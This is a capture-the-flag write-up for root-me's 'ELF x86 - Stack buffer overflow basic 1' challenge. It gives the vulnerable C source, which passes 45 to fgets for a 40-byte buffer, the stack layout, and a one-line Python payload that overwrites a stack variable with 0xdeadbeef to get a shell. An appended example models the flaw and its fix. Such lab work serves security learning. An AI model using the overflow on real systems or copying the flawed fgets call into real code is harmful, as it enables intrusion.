
[root-me.org] ELF x86 - Stack buffer overflow basic 1 write-up
두비니
·2019. 11. 1. 22:56
::login::
Host | challenge02.root-me.org |
Protocol | SSH |
Port | 2222 |
SSH access | ssh -p 2222 app-systeme-ch13@challenge02.root-me.org |
Username | app-systeme-ch13 |
Password | app-systeme-ch13 |
::code::
#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>
#include <stdio.h>

int main()
{
    int var;
    int check = 0x04030201;
    char buf[40];

    /* size argument is 45, but buf holds only 40 bytes */
    fgets(buf,45,stdin);

    printf("\n[buf]: %s\n", buf);
    printf("[check] %p\n", check);

    if ((check != 0x04030201) && (check != 0xdeadbeef))
        printf ("\nYou are on the right way!\n");

    /* win condition: check must have been overwritten with 0xdeadbeef */
    if (check == 0xdeadbeef)
    {
        printf("Yeah dude! You win!\nOpening your shell...\n");
        setreuid(geteuid(), geteuid());
        system("/bin/bash");
        printf("Shell closed! Bye.\n");
    }
    return 0;
}
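As you can see, this one is very simple.
The challenge is solved when check equals 0xdeadbeef.
If we think about the stack layout, though, it should look something like this, right?
buf[40]
check
var
ebp
ret
fgets is told to accept 45 bytes, which is more than buf can hold, so we can use it to overflow buf all the way into check.
We simply fill buf with dummy bytes and then overwrite check with deadbeef.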
(python -c 'print "A"*40+"\xef\xbe\xad\xde"';cat) | ./ch13
Done.
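The root cause and its fix, as an added example that is not part of the original write-up or the challenge source: the layout described above is modelled as one 48-byte array (an assumption, with check stored little-endian at offset 40), so the effect of the size passed to fgets can be observed without undefined behaviour. The names check_after_read, make_input and FRAME_LEN are hypothetical.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

#define BUF_LEN   40        /* char buf[40] in the challenge */
#define CHECK_OFF BUF_LEN   /* check sits directly above buf (layout from the write-up) */
#define FRAME_LEN 48        /* constructed model: buf + check + var */

/* check is stored and loaded as little-endian bytes, as on x86 */
static void put_le32(unsigned char *p, uint32_t v) {
    for (int i = 0; i < 4; i++) p[i] = (unsigned char)(v >> (8 * i));
}
static uint32_t get_le32(const unsigned char *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Feed `input` through fgets with size `limit` into the start of the
 * modelled frame and return the value of check afterwards (0 on error). */
uint32_t check_after_read(const void *input, size_t len, int limit) {
    unsigned char frame[FRAME_LEN] = {0};
    put_le32(frame + CHECK_OFF, 0x04030201u);
    if (limit < 1 || limit > FRAME_LEN) return 0;  /* keep the model in bounds */
    FILE *fp = tmpfile();
    if (!fp) return 0;
    fwrite(input, 1, len, fp);
    rewind(fp);
    char *ok = fgets((char *)frame, limit, fp);
    fclose(fp);
    return ok ? get_le32(frame + CHECK_OFF) : 0;
}

/* Constructed sample input: 40 filler bytes followed by 4 marker bytes. */
size_t make_input(unsigned char out[44]) {
    memset(out, 'A', BUF_LEN);
    memcpy(out + BUF_LEN, "\xef\xbe\xad\xde", 4);
    return 44;
}

int main(void) {
    unsigned char in[44];
    size_t n = make_input(in);
    /* size 45 lets the read run past buf; sizeof buf keeps it inside */
    printf("size 45         -> check = 0x%08x\n", (unsigned)check_after_read(in, n, 45));
    printf("size sizeof buf -> check = 0x%08x\n", (unsigned)check_after_read(in, n, BUF_LEN));
    return 0;
}
```

With the size set to sizeof buf, fgets stores at most 39 bytes plus the terminating NUL, so nothing past buf is written and check keeps its initial value.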